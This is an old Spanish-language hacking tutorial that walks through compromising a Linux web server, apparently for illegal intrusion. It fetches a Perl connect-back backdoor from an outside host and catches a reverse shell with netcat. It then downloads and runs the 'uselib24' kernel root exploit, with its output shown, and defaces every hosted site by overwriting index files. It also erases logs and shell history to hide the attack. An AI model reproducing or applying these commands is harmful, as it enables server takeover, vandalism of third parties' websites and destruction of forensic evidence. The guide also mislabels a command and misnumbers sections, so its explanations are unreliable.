Você está na página 1de 7

Acediendo Como R00t y Haciendo

un Mass Defacement.

*****9/10/2006******

By TX15 - ZeroHack Team

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~~~~~~~~~~INDICE~~~~~~~~~~~~~~
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

1-# Introdución
2-# Explicación de Permisos
3-# Acomodando Backshell en el Server
4-# Poniendo a la Escucha NetCat
5-# Onteniendo Informacion del Server
7-# Dar permisos y Ejecutar el Binario (r00texploit)
8-# Haciendo el Mass Defacement
9-# Borrando log's
10-# Despedida

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

~~~~~~~~~~~~~~
1-# Introdución
~~~~~~~~~~~~~~

Hola Amigos!
En este tutorial les voy a explicar como conseguir acesso r00t en un server LinuX.
Tambien se explicara como hacer el mass defacement, borrar logs y algun par de cosas
mas.
Espero ke les guste ;=)

Empezemos con el asunto :P

~~~~~~~~~~~~~~~~~~~~~~~~~~~
2-# Explicación de Permisos
~~~~~~~~~~~~~~~~~~~~~~~~~~~

Cuando tenemos haceso a un Server con una shell, nos fijamos que al lado de cada
archivo o carpeta nos salen estas letras:

(R) Lectura
(W) Escritura
(x) Ejecutación
(d) Directorio
(-) No tenemos
Cuando estes en netcat y pulses ls para ver los archivos y directorios ke hay, no les
saldran
los permisos que tene cada carpeta para verlos, en vez de solo poner ls, le añadimos -la

Ejemplo:
ls -la

Y a la izquierda del todo les saldran hay los permisos ;)


No solo les saldran los permisos, sino tambien la fecha que se subio, hora, etc...

Weno pues hay se les kitaron las dudas, ya saben lo que significa cada letra :D

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
3-# Acomodando Backshell en el Server
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Ahora subimos una backshell como la datach0s o la in que son backshells en perl.
Este tuto lo guiare con la datacha0s.
La subiremos en el directorio /tmp/ que es un directorio donde se guardan archivos
temporales
y en un 99% de los servers tendremos permisos de escritura :D

Para ir al directorio /tmp/ y subir la backshell ejecutaremos lo siguiente:

cd /tmp/;wget usuarios.lycos.es/teamzer0/backdoors/dc.pl

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
4-# Poniendo a la Escucha NetCat
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Una vez subida la dc.pl, dejamos el netcat en nuestro PC a la escucha, en este caso
dejaremos a la escucha el puerto 9000 poniendo lo siguiente:

-lvvp 9000

Cuando le pongamos a la escucha deberia aparecer lo siguiente:

listening on [any] 9000 ...

Ahora ya vamos a la shell y ejecutamos la dc.pl para conectarnos a nuestro PC de la


siguiente manera:

perl dc.pl TUIP PUERTOaLAescuchaENnetcat

Ejemplo:
perl dc.pl 10.0.1.251 9000

Nos Saldra lo siguiente en nuestra shell si se conecta a nuestro PC.

Data Cha0s Connect Back Backdoor


[*] Dumping Arguments
[*] Connecting...
[*] Spawning Shell
[*] Datached

Ahora nos fijamos en netcat y nos aparecera ke nos hemos conectado.


Parecido a esto:

connect to [81.47.74.9] from euirc.gr [66.225.230.248] 57566

Hay ya tamos conectados al server desde nuestro PC :D


Weno ahora la php shell con lo ke subimos la dc y nos conectamos ya la podemos
cerrar, ya que
ahora aremos todo ejecutando comandos desde la shell ke tenemos en netcat :P

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
5-# Onteniendo Informacion del Server
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Ponemos en el netcat:

pwd;uname -a

Significado de cada Comando:

id: Te dice en el Directorio que estas


uname -a: Informacion del Sistema

Al ejecutar eso les deberia salir algo parecido a esto:

/tmp
Linux server.corpoweb.com 2.4.20-021stab028.24.777-enterprise #1 SMP Fri Jan 6
9:39:27 MSK 2006 i686 athlon i386 GNU/Linux

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
7-# Dar permisos y Ejecutar el Binario (r00texploit)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Weno una vez que ya sabemos el kernel (2.4.20) podemos ir a www.milw0rm.com


y buscar su r00texploit.

En este caso utilizaremos el r00texploit "uselib24"


Pero casi todos los binarios se utilizan igual de como realizaremos.

Le subimos al server de esta manera:

wget usuarios.lycos.es/teamzer0/rootexploits/uselib24
Cuando este subido le damos permisos 777 (Lectura, escritura, ejecutacion) de esta
forma:

chmod -c 777 uselib24

Y una vez que se le de permisos 777 nos saldra un mensaje como este:

mode of `uselib24' changed to 0777 (rwxrwxrwx)

Ahora para ejecutar los binarios lo hacemos de esta forma:

./binario

En este momento:

./uselib24

Y no mas ejecutarle nos saldra esto:

# SLAB cleanup
child 1 VMAs 15599
# moved stack bfffe000, task_size=0xc0000000, map_base=0xbf800000
# vmalloc area 0xdf000000 - 0xfdea2000
Wait... -
# race won maps=23890
expanded VMA (0xbfffc000-0xffffe000)
[!] try to exploit 0xe0166000
# gate modified ( 0xffec958b 0x0804ec00 )
# exploited, uid=0

Ahora ponemos id y:

uid=0(root) gid=0(root) groups=48(apache),2523(psaserv)

Y BIEN SOMOS ROOT AMIGOS!!!


Ahora mandamos nosotros en el server xD

A la hora de ejecutar el uselib24 tengan calma, ya que habeces


suele tardar bastante en cargar y muchas veces dosea el server y cuando
vuelve a funcar el server eres r00t :P:P

La mayoria de los r00texploits no suelen tardar tanto y no suelen salir asi


texto como salia en este. En los demas le das permisos, le ejecutas, es recomendable
esperar por lo menos 1 minuto despues pulsas id y con suerte eres r00t.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
8-# Haciendo el Mass Defacement
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Weno ya que somos r00t y es nuestro el server xD vamos a dejar a las webs
que aloja un index xD.

1º- Hacemos nuestro index, le subimos a un server nuestro y despues lo


subimos a /tmp/ da igual donde lo suban, ya ken son root xD

Lo subimos asi:
wget urldenuestraweb.com/index.html

O tambien pueden coger otra vez la phpShell, van a tmp y lo suben ;)

2º- Buscamos las webs alojadas con este comando:

find / -name httpd.conf

Una vez que nos busque el archivo nos saldra en pantalla su directorio,
ahora para ver lo ke hay dentro utilizaremos el comando cat.
Ejemplo:

si el httpd.conf esta en el directorio:


/home/tx15/httpd.conf

Le ponemos el comando cat asi:


cat /home/tx15/httpd.conf

Hay nos saldran las webs alojadas en el server y tambien mucha info que no nos
interesa, asi que para sacar solo las webs, ponemos:

cat /home/tx15/httpd.conf|grep ServerName

Hay les saldran los dominios :D

Sino encuentran el archivo ese, tb pueden buscar las carpetas /www/ y /sites/
en el server, esas muchas veces tambien suelen traer hay las webs ;)

Weno como ya tenemos los dominios, les guardamos en nuestro PC en un .txt

3º- Ahora buscaremos todos los index.* del server y los sustituiremos
por el nuestro con este comando:

find /home/ -name "index.*" -exec cp /tmp/index.html {} \;

Hay hemos puesto que busque los index.* en /home/ (Si saben que estan las webs
alojadas
en otro directorio lo cambian y listo) y ke les sustituya por el index nuestro que tenemos
subido en /tmp/. Aqui dejenlo buen rato si hay varias webs y vayan a tomarse algo ;)
Una vez que este esto, ya deberian en las webs nuestro index :D

~~~~~~~~~~~~~~~~~~~
8-# Borrando Log's
~~~~~~~~~~~~~~~~~~~

Bien ahora borraremos las huellas jeje


Weno para borrar los logs utilizaremos esta tool:

http://usuarios.lycos.es/teamzer0/log.pl

La subimos asi:

wget usuarios.lycos.es/teamzer0/log.pl

O tambien la pueden subir desde la phpShell con el Uploader.


Una vez subida la damos permisos 777

Ya saben: chmod -c 777 log.pl

Nos tirara esto si le da permisos 777:

mode of `log.pl' changed to 0777 (rwxrwxrwx)

Ahora le ejecutamos de la siguiente manera:

perl log.pl

Se ejecutara la tool y empezara a buscar logs y archivos que registran lo que izimos.
La tool puede ke tarde un poco en buscarles y borrarles, pero kederaba bien :D

Si no se fian de la tool tambien puden ejecutar los siguientes comandos:


Este buscar todos los archivos con terminación .log y te los borra:

find / -name "*.log" -exec rm -rf {} \;

Despues borramos los archivos bash_history y bash_logout:

cd /;rm .bash_history
cd /;rm .bash_logut

Si no os encuentra ninguno de esos archivos, reseteamos el archivo que guarda el


Historial:

unset HISTFILE

~~~~~~~~~~~~~~~
10-# Despedida
~~~~~~~~~~~~~~~

Weno aqui ya acaba el tutorial, espero que muchos aprendan con este tutorial
y que algunos resuelvan algunas dudas que tenian en la cabeza ;)
Cualquier duda que tengan o comentarios envienlo a mi correo y lo
antes posible intentare resolversela.

Escrito por: TX15


E-Mail: tx1_5@yahoo.es

Você também pode gostar